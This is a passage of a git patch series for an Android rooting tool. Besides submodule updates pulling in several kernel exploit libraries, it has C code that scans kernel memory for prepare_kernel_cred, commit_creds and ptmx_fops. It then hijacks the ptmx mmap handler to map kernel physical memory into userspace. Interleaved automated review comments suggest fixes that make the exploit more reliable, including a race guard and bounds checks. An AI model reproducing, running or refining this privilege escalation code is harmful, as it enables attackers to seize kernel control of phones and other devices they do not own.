LOCAL_STATIC_LIBRARIES += libfb_mem_exploit +LOCAL_STATIC_LIBRARIES += libmsm_cameraconfig_exploit LOCAL_STATIC_LIBRARIES += libkallsyms LOCAL_STATIC_LIBRARIES += libcutils libc LOCAL_LDFLAGS += -static diff --git a/libexploit b/libexploit index 2c13202..ea44d29 160000 --- a/libexploit +++ b/libexploit @@ -1 +1 @@ -Subproject commit 2c132029ebc7d9afa6435b1cf858ccff16ea427c +Subproject commit ea44d29d5448e9ec89bedfd44af9a769c290eb26 
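Review bot: The new submodule entry pins `url = git://github.com/fi01/libmsm_cameraconfig_exploit.git`, while the libexploit entry directly above it in the same hunk already uses https. The git:// protocol is neither encrypted nor authenticated, so anyone on the path can serve a different repository for a library whose code ends up running with kernel privileges on the device; the recorded Subproject commit hash only helps if the clone actually comes from the intended origin and is checked. Change it to `url = https://github.com/fi01/libmsm_cameraconfig_exploit.git`, matching the libexploit entry.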
diff --git a/libmsm_cameraconfig_exploit b/libmsm_cameraconfig_exploit
new file mode 160000
index 0000000..5dd3072
--- /dev/null
+++ b/libmsm_cameraconfig_exploit
@@ -0,0 +1 @@
+Subproject commit 5dd3072fe63c8612aa2a63d48f40a450acb9c810
From 6fb97bdc82e987c67f33ef9976eefdef2142d493 Mon Sep 17 00:00:00 2001
From: fi01
Date: Thu, 3 Oct 2013 17:59:30 +0900
Subject: [PATCH 080/125] update subprojects
---
device_database | 2 +-
libmsm_acdb_exploit | 2 +-
2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/device_database b/device_database
index 765d935..26d329e 160000
--- a/device_database
+++ b/device_database
@@ -1 +1 @@
-Subproject commit 765d935473fcfba4391a4a926c47f32f26ea16b3
+Subproject commit 26d329e77c1a7ffaa680f6713943fb7d66693024
diff --git a/libmsm_acdb_exploit b/libmsm_acdb_exploit
index 09ca61d..7dddf0f 160000
--- a/libmsm_acdb_exploit
+++ b/libmsm_acdb_exploit
@@ -1 +1 @@
-Subproject commit 09ca61dfd4c40910d70e7fd34f63be282aacda0e
+Subproject commit 7dddf0fe69deb074c113c9560a2d7384711ab814
From 9e4c175976bcdda0e4b4a7c483bb92c8eea42cf0 Mon Sep 17 00:00:00 2001
From: fi01
Date: Sun, 13 Oct 2013 11:59:38 +0900
Subject: [PATCH 081/125] update subprojects
---
device_database | 2 +-
libmsm_acdb_exploit | 2 +-
libperf_event_exploit | 2 +-
3 files changed, 3 insertions(+), 3 deletions(-)
diff --git a/device_database b/device_database
index 26d329e..e2ca26a 160000
--- a/device_database
+++ b/device_database
@@ -1 +1 @@
-Subproject commit 26d329e77c1a7ffaa680f6713943fb7d66693024
+Subproject commit e2ca26aea1a7ef1791184dcc5d8fcd50c4e23698
diff --git a/libmsm_acdb_exploit b/libmsm_acdb_exploit
index 7dddf0f..dd1b72d 160000
--- a/libmsm_acdb_exploit
+++ b/libmsm_acdb_exploit
@@ -1 +1 @@
-Subproject commit 7dddf0fe69deb074c113c9560a2d7384711ab814
+Subproject commit dd1b72d2b47ff9f2e2cea4f8d26a593537270741
diff --git a/libperf_event_exploit b/libperf_event_exploit
index 87beb66..2506475 160000
--- a/libperf_event_exploit
+++ b/libperf_event_exploit
@@ -1 +1 @@
-Subproject commit 87beb6660aa2e7ef1b87df3c3643078f0d4bc209
+Subproject commit 2506475033253a268feaa0b049332c11e943201d
From c72c316ad392273ee5074b707972ce3683288b24 Mon Sep 17 00:00:00 2001
From: fi01
Date: Tue, 15 Oct 2013 01:51:37 +0900
Subject: [PATCH 082/125] update subprojects
---
device_database | 2 +-
libmsm_acdb_exploit | 2 +-
2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/device_database b/device_database
index e2ca26a..e54ae07 160000
--- a/device_database
+++ b/device_database
@@ -1 +1 @@
-Subproject commit e2ca26aea1a7ef1791184dcc5d8fcd50c4e23698
+Subproject commit e54ae07ebe6e07696d8cf07fec437dfcd6ead0f1
diff --git a/libmsm_acdb_exploit b/libmsm_acdb_exploit
index dd1b72d..739eca0 160000
--- a/libmsm_acdb_exploit
+++ b/libmsm_acdb_exploit
@@ -1 +1 @@
-Subproject commit dd1b72d2b47ff9f2e2cea4f8d26a593537270741
+Subproject commit 739eca0886cc8c990cb383ee3cb73786a07e3cc4
From 361b02e8a807ec78733a97d1d2eb12479c484c19 Mon Sep 17 00:00:00 2001
From: fi01
Date: Tue, 5 Nov 2013 22:02:41 +0900
Subject: [PATCH 083/125] update subprojects
---
device_database | 2 +-
libmsm_acdb_exploit | 2 +-
2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/device_database b/device_database
index e54ae07..6ca2f08 160000
--- a/device_database
+++ b/device_database
@@ -1 +1 @@
-Subproject commit e54ae07ebe6e07696d8cf07fec437dfcd6ead0f1
+Subproject commit 6ca2f08e204387b4c508caedc3542ce82f4ce147
diff --git a/libmsm_acdb_exploit b/libmsm_acdb_exploit
index 739eca0..0164e69 160000
--- a/libmsm_acdb_exploit
+++ b/libmsm_acdb_exploit
@@ -1 +1 @@
-Subproject commit 739eca0886cc8c990cb383ee3cb73786a07e3cc4
+Subproject commit 0164e6977df2fcd63161a656eda522ad6045ce41
From 72857d9793022e7a0738189c3298721265d662ab Mon Sep 17 00:00:00 2001
From: fi01
Date: Thu, 7 Nov 2013 10:19:29 +0900
Subject: [PATCH 084/125] update subprojects
---
device_database | 2 +-
libmsm_acdb_exploit | 2 +-
2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/device_database b/device_database
index 6ca2f08..ba183d9 160000
--- a/device_database
+++ b/device_database
@@ -1 +1 @@
-Subproject commit 6ca2f08e204387b4c508caedc3542ce82f4ce147
+Subproject commit ba183d9f860507499b8e39af4ca58ce6432301c9
diff --git a/libmsm_acdb_exploit b/libmsm_acdb_exploit
index 0164e69..38b3f0f 160000
--- a/libmsm_acdb_exploit
+++ b/libmsm_acdb_exploit
@@ -1 +1 @@
-Subproject commit 0164e6977df2fcd63161a656eda522ad6045ce41
+Subproject commit 38b3f0fe48717117ecca24884adf30b8c0d74dbd
From adacf192e289d15f4db846675bb1c6c2d9cccc24 Mon Sep 17 00:00:00 2001
From: fi01
Date: Fri, 8 Nov 2013 10:44:55 +0900
Subject: [PATCH 085/125] update subprojects
---
device_database | 2 +-
libmsm_acdb_exploit | 2 +-
2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/device_database b/device_database
index ba183d9..a361d23 160000
--- a/device_database
+++ b/device_database
@@ -1 +1 @@
-Subproject commit ba183d9f860507499b8e39af4ca58ce6432301c9
+Subproject commit a361d238f5c2cf03a649a60bd93a866d14a6b707
diff --git a/libmsm_acdb_exploit b/libmsm_acdb_exploit
index 38b3f0f..f63b2cd 160000
--- a/libmsm_acdb_exploit
+++ b/libmsm_acdb_exploit
@@ -1 +1 @@
-Subproject commit 38b3f0fe48717117ecca24884adf30b8c0d74dbd
+Subproject commit f63b2cd6675172308820b6d29e7d9eae140058b5
From 66babec549367ed0e1e7f9f76d82abcf5295b093 Mon Sep 17 00:00:00 2001
From: fi01
Date: Wed, 13 Nov 2013 13:39:47 +0900
Subject: [PATCH 086/125] update subprojects
---
device_database | 2 +-
libmsm_acdb_exploit | 2 +-
libperf_event_exploit | 2 +-
3 files changed, 3 insertions(+), 3 deletions(-)
diff --git a/device_database b/device_database
index a361d23..67e4c80 160000
--- a/device_database
+++ b/device_database
@@ -1 +1 @@
-Subproject commit a361d238f5c2cf03a649a60bd93a866d14a6b707
+Subproject commit 67e4c803591f3aee9ed0d2a74a79043bd3d416d0
diff --git a/libmsm_acdb_exploit b/libmsm_acdb_exploit
index f63b2cd..ade80ca 160000
--- a/libmsm_acdb_exploit
+++ b/libmsm_acdb_exploit
@@ -1 +1 @@ -Subproject commit f63b2cd6675172308820b6d29e7d9eae140058b5 +Subproject commit ade80cae74e959f2750c44690e6c20a6586975d2 diff --git a/libperf_event_exploit b/libperf_event_exploit index 2506475..db58c5d 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit 2506475033253a268feaa0b049332c11e943201d +Subproject commit db58c5d5767f007e3420c2232652506de787f6f0 From 98f800c2bd75e98b17c1030c5c7270c872be7fd1 Mon Sep 17 00:00:00 2001 From: fi01 Date: Thu, 14 Nov 2013 10:53:49 +0900 Subject: [PATCH 087/125] update subprojects --- device_database | 2 +- libmsm_acdb_exploit | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/device_database b/device_database index 67e4c80..57fb8ac 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 67e4c803591f3aee9ed0d2a74a79043bd3d416d0 +Subproject commit 57fb8ac73edc1cce51bbc48f56dd193002187f1f diff --git a/libmsm_acdb_exploit b/libmsm_acdb_exploit index ade80ca..4ea9f84 160000 --- a/libmsm_acdb_exploit +++ b/libmsm_acdb_exploit @@ -1 +1 @@ -Subproject commit ade80cae74e959f2750c44690e6c20a6586975d2 +Subproject commit 4ea9f847e2ffd8077d493c45e6a4973b4929688f From f20030a5050135b89ae9704cb3114cf84cca10a5 Mon Sep 17 00:00:00 2001 From: fi01 Date: Mon, 18 Nov 2013 12:50:12 +0900 Subject: [PATCH 088/125] Add libput_user_exploit --- .gitmodules | 3 +++ Android.mk | 1 + libexploit | 2 +- libput_user_exploit | 1 + 4 files changed, 6 insertions(+), 1 deletion(-) create mode 160000 libput_user_exploit diff --git a/.gitmodules b/.gitmodules index 11e896e..35545bc 100644 --- a/.gitmodules +++ b/.gitmodules @@ -25,3 +25,6 @@ [submodule "libmsm_cameraconfig_exploit"] path = libmsm_cameraconfig_exploit url = git://github.com/fi01/libmsm_cameraconfig_exploit.git +[submodule "libput_user_exploit"] + path = libput_user_exploit + url = https://github.com/fi01/libput_user_exploit.git diff --git a/Android.mk b/Android.mk index e836ad9..0ff6128 100644 
--- a/Android.mk +++ b/Android.mk @@ -19,6 +19,7 @@ LOCAL_STATIC_LIBRARIES += libmsm_acdb_exploit LOCAL_STATIC_LIBRARIES += libfj_hdcp_exploit LOCAL_STATIC_LIBRARIES += libfb_mem_exploit LOCAL_STATIC_LIBRARIES += libmsm_cameraconfig_exploit +LOCAL_STATIC_LIBRARIES += libput_user_exploit LOCAL_STATIC_LIBRARIES += libkallsyms LOCAL_STATIC_LIBRARIES += libcutils libc LOCAL_LDFLAGS += -static diff --git a/libexploit b/libexploit index ea44d29..d5085f5 160000 --- a/libexploit +++ b/libexploit @@ -1 +1 @@ -Subproject commit ea44d29d5448e9ec89bedfd44af9a769c290eb26 +Subproject commit d5085f51be4dede39230015a3e71b1d8da83c579 diff --git a/libput_user_exploit b/libput_user_exploit new file mode 160000 index 0000000..86c2272 --- /dev/null +++ b/libput_user_exploit @@ -0,0 +1 @@ +Subproject commit 86c22721e89a5c72261851786405e2223950ee58 From c5f5051cb64d8ab2a342877ee5d0b4a75a71cbe5 Mon Sep 17 00:00:00 2001 From: fi01 Date: Mon, 18 Nov 2013 18:13:19 +0900 Subject: [PATCH 089/125] update subprojects --- device_database | 2 +- libput_user_exploit | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/device_database b/device_database index 57fb8ac..6b227ff 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 57fb8ac73edc1cce51bbc48f56dd193002187f1f +Subproject commit 6b227ffb7082cf2119883302c5dc62389478244d diff --git a/libput_user_exploit b/libput_user_exploit index 86c2272..d437838 160000 --- a/libput_user_exploit +++ b/libput_user_exploit @@ -1 +1 @@ -Subproject commit 86c22721e89a5c72261851786405e2223950ee58 +Subproject commit d43783871e38a3d26fa8c4ecd50c9453f8fa5a78 From 7a47b1d2eb4275f17337fef09a743a3e2c90d0d2 Mon Sep 17 00:00:00 2001 From: fi01 Date: Sat, 19 Oct 2013 12:34:59 +0900 Subject: [PATCH 090/125] update subprojects --- libkallsyms | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/libkallsyms b/libkallsyms index cb04750..86f2c67 160000 --- a/libkallsyms +++ b/libkallsyms 
@@ -1 +1 @@ -Subproject commit cb047501155601e7699e4653ba2067d6cf1087b4 +Subproject commit 86f2c67b0be6718fd4b5a510180666e7d49f2cf7 From c9c69d10771b8d408751ebd436ab13fc9abae482 Mon Sep 17 00:00:00 2001 From: fi01 Date: Tue, 19 Nov 2013 18:37:36 +0900 Subject: [PATCH 091/125] update subprojects --- device_database | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/device_database b/device_database index 6b227ff..f92ea92 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 6b227ffb7082cf2119883302c5dc62389478244d +Subproject commit f92ea92e0b3e34f0f0ed5ba5f9fc348ad5d81516 From c1109f45b9ff2e3f66a227b8ebc8fb38a83cc85a Mon Sep 17 00:00:00 2001 From: fi01 Date: Sat, 23 Nov 2013 21:30:57 +0900 Subject: [PATCH 092/125] update subprojects --- device_database | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/device_database b/device_database index f92ea92..e1c4e1f 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit f92ea92e0b3e34f0f0ed5ba5f9fc348ad5d81516 +Subproject commit e1c4e1f8fe8fc3a1f5d2299cfae818c759ab211d From 9aaa917db4ef96a2632bfccc4f46346e8ad44b21 Mon Sep 17 00:00:00 2001 From: fi01 Date: Thu, 28 Nov 2013 17:52:18 +0900 Subject: [PATCH 093/125] Add libget_user_exploit --- .gitmodules | 3 +++ Android.mk | 1 + device_database | 2 +- libexploit | 2 +- libget_user_exploit | 1 + main.c | 5 ++++- mm.c | 47 +++++++++++++++++++++++++++++++++++---------- mm.h | 5 +++-- 8 files changed, 51 insertions(+), 15 deletions(-) create mode 160000 libget_user_exploit diff --git a/.gitmodules b/.gitmodules index 35545bc..f457376 100644 --- a/.gitmodules +++ b/.gitmodules @@ -28,3 +28,6 @@ [submodule "libput_user_exploit"] path = libput_user_exploit url = https://github.com/fi01/libput_user_exploit.git +[submodule "libget_user_exploit"] + path = libget_user_exploit + url = https://github.com/fi01/libget_user_exploit.git diff --git a/Android.mk b/Android.mk index 0ff6128..cbfdb80 100644 
--- a/Android.mk +++ b/Android.mk @@ -20,6 +20,7 @@ LOCAL_STATIC_LIBRARIES += libfj_hdcp_exploit LOCAL_STATIC_LIBRARIES += libfb_mem_exploit LOCAL_STATIC_LIBRARIES += libmsm_cameraconfig_exploit LOCAL_STATIC_LIBRARIES += libput_user_exploit +LOCAL_STATIC_LIBRARIES += libget_user_exploit LOCAL_STATIC_LIBRARIES += libkallsyms LOCAL_STATIC_LIBRARIES += libcutils libc LOCAL_LDFLAGS += -static diff --git a/device_database b/device_database index e1c4e1f..c7457c1 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit e1c4e1f8fe8fc3a1f5d2299cfae818c759ab211d +Subproject commit c7457c1af43b2fdd80e50e02a2e0488185cd4f52 diff --git a/libexploit b/libexploit index d5085f5..76252ed 160000 --- a/libexploit +++ b/libexploit @@ -1 +1 @@ -Subproject commit d5085f51be4dede39230015a3e71b1d8da83c579 +Subproject commit 76252ed65f67a87402628d2d12f38f30550d2287 diff --git a/libget_user_exploit b/libget_user_exploit new file mode 160000 index 0000000..bedea14 --- /dev/null +++ b/libget_user_exploit @@ -0,0 +1 @@ +Subproject commit bedea14b5148931bf8bc98f8dfbac55f707a73ea diff --git a/main.c b/main.c index 2ce0a2b..1a02edb 100644 --- a/main.c +++ b/main.c @@ -136,7 +136,10 @@ setup_variables(void) } printf("Try to find address in memory...\n"); - run_with_mmap(find_variables_in_memory); + if (!run_with_mmap(find_variables_in_memory)) { + printf("\n"); + run_with_memcpy(find_variables_in_memory); + } if (prepare_kernel_cred && commit_creds && ptmx_fops) { printf(" prepare_kernel_cred = %p\n", prepare_kernel_cred); diff --git a/mm.c b/mm.c index 0260a3a..03d9e94 100644 --- a/mm.c +++ b/mm.c @@ -101,7 +101,7 @@ run_callback_with_mmap(void *user_data) int fd; void *address; void *start_address = (void *)0x20000000; - mmap_callback_t callback = (mmap_callback_t)user_data; + memory_callback_t callback = (memory_callback_t)user_data; bool ret; fd = open(PTMX_DEVICE, O_RDWR); 
@@ -123,15 +123,15 @@ run_callback_with_mmap(void *user_data) return ret; } -typedef struct _callback_mmap_exploit_info_t { - mmap_callback_t func; +typedef struct _callback_memory_exploit_info_t { + memory_callback_t func; bool result; -} callback_mmap_exploit_info_t; +} callback_memory_exploit_info_t; static bool -run_callback_mmap_exploit(void *address, size_t length, void *param) +run_callback_memory_exploit(void *address, size_t length, void *param) { - callback_mmap_exploit_info_t *info = param; + callback_memory_exploit_info_t *info = param; info->result = info->func(address, length); @@ -139,13 +139,13 @@ run_callback_mmap_exploit(void *address, size_t length, void *param) } static bool -run_exploit_mmap(mmap_callback_t callback, bool *result) +run_exploit_mmap(memory_callback_t callback, bool *result) { - callback_mmap_exploit_info_t info; + callback_memory_exploit_info_t info; info.func = callback; - if (attempt_mmap_exploit(&run_callback_mmap_exploit, &info)) { + if (attempt_mmap_exploit(&run_callback_memory_exploit, &info)) { *result = info.result; return true; } @@ -154,7 +154,7 @@ run_exploit_mmap(mmap_callback_t callback, bool *result) } bool -run_with_mmap(mmap_callback_t callback) +run_with_mmap(memory_callback_t callback) { unsigned long int kernel_physical_offset; bool result; @@ -189,3 +189,30 @@ run_with_mmap(mmap_callback_t callback) (unsigned long int)&ptmx_mmap, 0, run_callback_with_mmap, callback); } + +static bool +run_exploit_memcpy(memory_callback_t callback, bool *result) +{ + callback_memory_exploit_info_t info; + + info.func = callback; + + if (attempt_memcpy_exploit(&run_callback_memory_exploit, &info)) { + *result = info.result; + return true; + } + + return false; +} + +bool +run_with_memcpy(memory_callback_t callback) +{ + bool result; + + if (run_exploit_memcpy(callback, &result)) { + return result; + } + + return false; +} diff --git a/mm.h b/mm.h index 2a0ae67..53aaf04 100644 --- a/mm.h +++ b/mm.h 
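Review bot: `run_with_memcpy` leaves `bool result;` uninitialized and then needs two branches to express "the exploit ran and the callback said yes", the same shape run_with_mmap already carries; `bool result = false;` followed by `return run_exploit_memcpy(callback, &result) && result;` is shorter and cannot read `result` on a path where run_exploit_memcpy did not store it. Unlike run_with_mmap, it also prints nothing before attempting, so a failing memcpy path is silent unless libexploit itself prints (cannot tell from here). The new function has no header comment either; something like `/* Fallback for run_with_mmap(): run callback over kernel memory obtained via attempt_memcpy_exploit(). */` would tell the reader why main.c calls it second.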
@@ -36,10 +36,11 @@ struct vm_area_struct { /* ... */ }; -typedef bool (*mmap_callback_t)(void *mem, size_t length); +typedef bool (*memory_callback_t)(void *mem, size_t length); extern bool setup_remap_pfn_range_address(void); -extern bool run_with_mmap(mmap_callback_t callback); +extern bool run_with_mmap(memory_callback_t callback); +extern bool run_with_memcpy(memory_callback_t callback); extern void set_kernel_phys_offset(unsigned long int offset); extern void *convert_to_kernel_address(void *address, void *mmap_base_address); From ddf15a54e235250004f2223d8a2fee22ebfcafba Mon Sep 17 00:00:00 2001 From: fi01 Date: Sat, 7 Dec 2013 11:24:21 +0900 Subject: [PATCH 094/125] update subprojects --- device_database | 2 +- libkallsyms | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/device_database b/device_database index c7457c1..cf3853a 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit c7457c1af43b2fdd80e50e02a2e0488185cd4f52 +Subproject commit cf3853a407efbbb8222f0b21e7a24729a274010f diff --git a/libkallsyms b/libkallsyms index 86f2c67..49f2ec7 160000 --- a/libkallsyms +++ b/libkallsyms @@ -1 +1 @@ -Subproject commit 86f2c67b0be6718fd4b5a510180666e7d49f2cf7 +Subproject commit 49f2ec7bce717e1b64f5d22270cbdb452236648e From 3f4397af30f963d53176856463c959257a43e0db Mon Sep 17 00:00:00 2001 From: fi01 Date: Mon, 9 Dec 2013 21:07:49 +0900 Subject: [PATCH 095/125] Enable kallsyms_in_memory_free() that it crashes no longer --- main.c | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/main.c b/main.c index 1a02edb..d6554ba 100644 --- a/main.c +++ b/main.c @@ -110,8 +110,7 @@ bool find_variables_in_memory(void *mem, size_t length) } } - //FIXME: do not free to avoid crash with fb_mem exploit - //kallsyms_in_memory_free(info); + kallsyms_in_memory_free(info); if (prepare_kernel_cred && commit_creds && ptmx_fops) { return true; From d6dee78e3ac3ca1329ff90a77f366289b0d9b30b Mon Sep 17 00:00:00 2001 
From: fi01 Date: Mon, 9 Dec 2013 21:38:31 +0900 Subject: [PATCH 096/125] Fix searching ptmx_fops address, now it ignores file operations what will be NULL. --- ptmx.c | 29 ++++++++++++++++++----------- 1 file changed, 18 insertions(+), 11 deletions(-) diff --git a/ptmx.c b/ptmx.c index fccafd9..8f5bc68 100644 --- a/ptmx.c +++ b/ptmx.c @@ -55,19 +55,26 @@ setup_ptmx_fops_fsync_address(void) bool setup_ptmx_fops_address_in_memory(void *mem, size_t length, find_ptmx_fops_hint_t *hint) { - unsigned long int pattern[16]; - void *address; + int i; - memset(pattern, 0, sizeof pattern); - pattern[2] = hint->ptmx_open_address; - pattern[4] = hint->tty_release_address; - pattern[7] = hint->tty_fasync_address; + for (i = 0x24; i < length - 0x40; i += 4) { + unsigned long int *address = mem + i; - address = memmem(mem, length, pattern, sizeof pattern); - if (!address) { - return false; + if (address[2] != hint->ptmx_open_address) { + continue; + } + + if (address[4] != hint->tty_release_address) { + continue; + } + + if (address[7] != hint->tty_fasync_address) { + continue; + } + + ptmx_fops = (void *)convert_to_kernel_address(address, mem) - 0x24; + return true; } - ptmx_fops = (void *)convert_to_kernel_address(address, mem) - 0x24; - return true; + return false; } From f029ae8af8a8d0cf3124694fb59770002a84ca2a Mon Sep 17 00:00:00 2001 From: fi01 Date: Fri, 6 Dec 2013 20:03:59 +0900 Subject: [PATCH 097/125] Use sqlite3 database --- .gitmodules | 3 +++ device_database | 2 +- libsqlite | 1 + 3 files changed, 5 insertions(+), 1 deletion(-) create mode 160000 libsqlite diff --git a/.gitmodules b/.gitmodules index f457376..c257cea 100644 --- a/.gitmodules +++ b/.gitmodules @@ -31,3 +31,6 @@ [submodule "libget_user_exploit"] path = libget_user_exploit url = https://github.com/fi01/libget_user_exploit.git +[submodule "libsqlite"] + path = libsqlite + url = https://github.com/android-rooting-tools/android_libsqlite.git 
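Review bot: The loop bound `i < length - 0x40` in the new scan is computed in size_t, so a `length` smaller than 0x40 wraps to a huge value and the loop reads well past the end of `mem`; with `int i` the comparison is also signed-versus-unsigned, so no negative value of i could ever stop it. Add `if (length < 0x40) return false;` before the loop and declare `size_t i;` so the types agree. The 0x24 start and 0x40 margin are presumably the offsets of the open/release/fasync slots relative to the start of struct file_operations; giving them names would make the trailing `- 0x24` on the ptmx_fops line self-explanatory.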
diff --git a/device_database b/device_database index cf3853a..f6a1b9f 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit cf3853a407efbbb8222f0b21e7a24729a274010f +Subproject commit f6a1b9f12b0e296dcf36c6bb727dbef7ab0f7498 diff --git a/libsqlite b/libsqlite new file mode 160000 index 0000000..a3b9d6e --- /dev/null +++ b/libsqlite @@ -0,0 +1 @@ +Subproject commit a3b9d6ed247e201e4969d2fdd0eed28f07605550 From 05b7f10c4b862be34c772c3176a6c467a44e05c3 Mon Sep 17 00:00:00 2001 From: fi01 Date: Sat, 7 Dec 2013 13:58:13 +0900 Subject: [PATCH 098/125] Register device and addresses if it founds them out --- device_database | 2 +- main.c | 7 +++++++ 2 files changed, 8 insertions(+), 1 deletion(-) diff --git a/device_database b/device_database index f6a1b9f..33e1444 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit f6a1b9f12b0e296dcf36c6bb727dbef7ab0f7498 +Subproject commit 33e1444aa373784f6dec282eaedbf57471162cba diff --git a/main.c b/main.c index d6554ba..e839173 100644 --- a/main.c +++ b/main.c @@ -11,6 +11,7 @@ #include #include +#include "device_database.h" #include "cred.h" #include "mm.h" #include "ptmx.h" @@ -145,6 +146,12 @@ setup_variables(void) printf(" commit_creds = %p\n", commit_creds); printf(" ptmx_fops = %p\n", ptmx_fops); +#ifdef HAS_SET_SYMBOL_ADDRESS + device_set_symbol_address(DEVICE_SYMBOL(prepare_kernel_cred), (unsigned long int)prepare_kernel_cred); + device_set_symbol_address(DEVICE_SYMBOL(commit_creds), (unsigned long int)commit_creds); + device_set_symbol_address(DEVICE_SYMBOL(ptmx_fops), (unsigned long int)ptmx_fops); +#endif /* HAS_SET_SYMBOL_ADDRESS */ + return true; } From 9442fea1bf48276c6356194b7d558da691a8a834 Mon Sep 17 00:00:00 2001 From: fi01 Date: Sat, 7 Dec 2013 18:48:56 +0900 Subject: [PATCH 099/125] update subprojects --- device_database | 2 +- libsqlite | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) 
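Review bot: The three new `device_set_symbol_address` calls persist whatever the memory scan produced as soon as all three addresses are non-NULL, before anything has shown they are correct; if device_get_symbol_address is consulted first on later runs (the kernel_physical_offset lookup in mm.c suggests that is the pattern), a wrong guess becomes sticky and is written into the kernel again on every subsequent run. Prefer registering after the root attempt has succeeded, or at least mark these entries as heuristic so they can be invalidated. Either way the `#ifdef` block deserves a comment such as `/* Cache scan results so the next run can skip the search; only safe if these addresses were verified. */`. setup_variables begins before the hunk.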
diff --git a/device_database b/device_database index 33e1444..7ce318e 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 33e1444aa373784f6dec282eaedbf57471162cba +Subproject commit 7ce318ef25308b46b8279c94561e38b5fe06d239 diff --git a/libsqlite b/libsqlite index a3b9d6e..49e176c 160000 --- a/libsqlite +++ b/libsqlite @@ -1 +1 @@ -Subproject commit a3b9d6ed247e201e4969d2fdd0eed28f07605550 +Subproject commit 49e176c19a639bbc47afc17b9ebb641c23049d64 From eb964a938cf53bc3f9178fda707e339f9f9014ea Mon Sep 17 00:00:00 2001 From: fi01 Date: Tue, 10 Dec 2013 16:28:57 +0900 Subject: [PATCH 100/125] Fix error messages --- main.c | 6 +++--- mm.c | 6 +++--- 2 files changed, 6 insertions(+), 6 deletions(-) diff --git a/main.c b/main.c index e839173..60f5cc0 100644 --- a/main.c +++ b/main.c @@ -156,15 +156,15 @@ setup_variables(void) } if (!prepare_kernel_cred) { - printf("Failed to get prepare_kernel_cred addresses.\n"); + printf("Failed to get prepare_kernel_cred address.\n"); } if (!commit_creds) { - printf("Failed to get commit_creds addresses.\n"); + printf("Failed to get commit_creds address.\n"); } if (!ptmx_fops) { - printf("Failed to get ptmx_fops addresses.\n"); + printf("Failed to get ptmx_fops address.\n"); } print_reason_device_not_supported(); diff --git a/mm.c b/mm.c index 03d9e94..f155cd0 100644 --- a/mm.c +++ b/mm.c @@ -166,13 +166,13 @@ run_with_mmap(memory_callback_t callback) setup_remap_pfn_range_address(); if (!remap_pfn_range) { - printf("You need to manage to get remap_pfn_range addresses.\n"); + printf("You need to manage to get remap_pfn_range address.\n"); return false; } setup_ptmx_fops_mmap_address(); if (!ptmx_fops_mmap_address) { - printf("You need to manage to get ptmx_fops addresses.\n"); + printf("You need to manage to get ptmx_fops address.\n"); return false; } 
@@ -181,7 +181,7 @@ run_with_mmap(memory_callback_t callback) set_kernel_phys_offset(kernel_physical_offset - 0x00008000); } else if (!detect_kernel_phys_parameters()) { - printf("You need to manage to get kernel_physical_offset addresses.\n"); + printf("You need to manage to get kernel_physical_offset address.\n"); return false; } From 50b9602b91dd0ccb1e5d8ad4506bbe7698f8f8fc Mon Sep 17 00:00:00 2001 From: fi01 Date: Tue, 10 Dec 2013 22:37:31 +0900 Subject: [PATCH 101/125] Fixed crash when it installs ptmx_fops.mmap handler by libput_user_exploit, that breaks ptmx_fops.open handler. --- mm.c | 47 ++++++++++++++++++++++++++++++++++++++++------- 1 file changed, 40 insertions(+), 7 deletions(-) diff --git a/mm.c b/mm.c index f155cd0..44419f6 100644 --- a/mm.c +++ b/mm.c @@ -87,16 +87,41 @@ detect_kernel_phys_parameters(void) return true; } +static void *old_mmap_handler; + int ptmx_mmap(struct file *filep, struct vm_area_struct *vma) { - return remap_pfn_range(vma, vma->vm_start, - kernel_phys_offset >> PAGE_SHIFT, - vma->vm_end - vma->vm_start, vma->vm_page_prot); + void **p; + int ret; + + p = (void **)ptmx_fops_mmap_address; + + ret = remap_pfn_range(vma, vma->vm_start, + kernel_phys_offset >> PAGE_SHIFT, + vma->vm_end - vma->vm_start, vma->vm_page_prot); + + if (p) { + *p = old_mmap_handler; + } + + return ret; +} + +static void +setup_mmap_by_fsync(void) +{ + void **p; + + p = (void **)ptmx_fops_mmap_address; + if (p) { + old_mmap_handler = *p; + *p = (void *)&ptmx_mmap; + } } static bool -run_callback_with_mmap(void *user_data) +run_callback_with_fsync_and_mmap(void *user_data) { int fd; void *address; @@ -105,6 +130,8 @@ run_callback_with_mmap(void *user_data) bool ret; fd = open(PTMX_DEVICE, O_RDWR); + fsync(fd); + address = mmap(start_address, KERNEL_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_FIXED, fd, 0); 
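Review bot: `setup_mmap_by_fsync` saves `old_mmap_handler = *p` unconditionally, so if the fsync hook fires a second time before `ptmx_mmap` has run (ptmx_fops is shared system-wide, so any process's fsync on /dev/ptmx while the hook is installed counts), old_mmap_handler becomes `&ptmx_mmap` itself and the restore in ptmx_mmap then leaves the hook installed permanently, pointing at a userspace address in a process that will exit. Guard the save: `if (p && *p != (void *)&ptmx_mmap) { old_mmap_handler = *p; *p = (void *)&ptmx_mmap; }`. The window is small, but the failure mode is a kernel function pointer into a dead process, i.e. a panic on the next ptmx mmap anywhere on the system.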
